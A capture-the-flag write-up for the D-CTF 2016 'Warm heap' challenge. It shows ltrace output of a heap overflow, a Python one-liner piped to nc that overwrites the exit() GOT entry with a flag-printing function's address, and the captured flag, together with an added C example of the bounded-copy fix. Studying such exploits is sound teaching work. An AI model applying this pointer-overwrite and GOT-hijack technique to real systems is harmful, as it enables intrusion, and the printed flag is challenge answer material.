D-CTF Quals 2016 - Warm heap [Exploit]

Competition: https://dctf.def.camp/
Challenge Name: Warm heap
Type: Exploitation
Points: 100

Checking the provided binary (ELF x64), only NX is enabled.
Inspecting it and feeding a long string on the first line produces a segmentation fault. Using ltrace it is possible to see exactly what is going on:

$ ltrace ./exp100.bin
__libc_start_main(0x4008a8, 1, 0x7ffdb143cf78, 0x4009c0 <unfinished ...>
...
fgets(AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"..., 4096, 0x7f4d857ba8e0) = 0x7ffdb143be80
strcpy(0x237a030, "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"...) = 0x237a030
fgets(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., 4096, 0x7f4d857ba8e0) = 0x7ffdb143be80
strcpy(0x4141464141304141, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"... <no return ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

As observed, with a 40-byte offset on the first line we control the first argument of the second strcpy(), the destination address, and with the second line we control its second argument, the data being copied. So let's plan the strategy.
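To make the defect behind that trace concrete, here is an added example (not code from the challenge binary or from the author) of the hardened form: a heap-style object in which a fixed-size string buffer sits directly before a pointer, and a copy routine that refuses input that does not fit. The layout (a 40-byte name field followed by a pointer, mirroring the offset observed above), the struct and the function names are assumptions for illustration. strcpy() has no notion of the destination's size, so a first line longer than the buffer runs straight into the pointer; the bounded version checks the length first and leaves the pointer untouched.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout for illustration (not the challenge's source): a
   fixed-size string buffer directly followed by a pointer that a later
   copy writes through. With strcpy(), a first line longer than NAME_LEN
   overruns into `target`, which is what redirects the second strcpy()
   in the ltrace output. */
#define NAME_LEN 40

struct entry {
    char name[NAME_LEN];
    char *target;
};

/* Bounded replacement for the strcpy() call: copy one fgets()-style line
   (trailing newline dropped) into e->name only if it fits with its NUL.
   Returns 0 on success, -1 if the line is too long; on -1 nothing is
   written, so e->target keeps whatever the program assigned to it. */
int set_name(struct entry *e, const char *line)
{
    size_t n = strcspn(line, "\n");      /* length up to, not including, '\n' */
    if (n >= sizeof e->name)             /* need one byte for the terminator */
        return -1;
    memcpy(e->name, line, n);
    e->name[n] = '\0';
    return 0;
}

int main(void)
{
    char scratch[16];
    struct entry e = { "", scratch };

    /* Constructed input: 44 'A's, the same shape as the crashing first line. */
    char overlong[64];
    memset(overlong, 'A', 44);
    overlong[44] = '\n';
    overlong[45] = '\0';

    if (set_name(&e, overlong) != 0)
        printf("rejected %zu-byte line; target pointer %s\n",
               strlen(overlong) - 1, e.target == scratch ? "intact" : "CORRUPTED");

    if (set_name(&e, "warm heap\n") == 0)
        printf("stored \"%s\"; target pointer %s\n",
               e.name, e.target == scratch ? "intact" : "CORRUPTED");
    return 0;
}
```

The check is the whole fix: the destination size is known at the call site, so the copy is rejected before it can reach the adjacent field. In the binary as traced, the 4096-byte fgets() buffer is copied into a far smaller heap allocation with no such check, which is the mismatch the exploit below relies on.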

While reversing it, it is possible to see that the program calls exit() through its GOT entry at 0x601068 after the string copies are done, so we can overwrite that entry with any address we want and execution will be transferred there.

Inspecting the binary in IDA Pro, we can easily identify a function that prints the flag at 0x400826.

So we overwrite the exit GOT entry with the address of the flag-printing function:

$ python -c 'print "A"*40 + "\x68\x10\x60\x00\x00\x00\x00\x00" + "\n" + "\x26\x08\x40\x00\x00"'| nc 10.13.37.21 13371

And the flag comes up:

DCTF{b94c21ff7531cba35a498cb074918b3e}

mphx2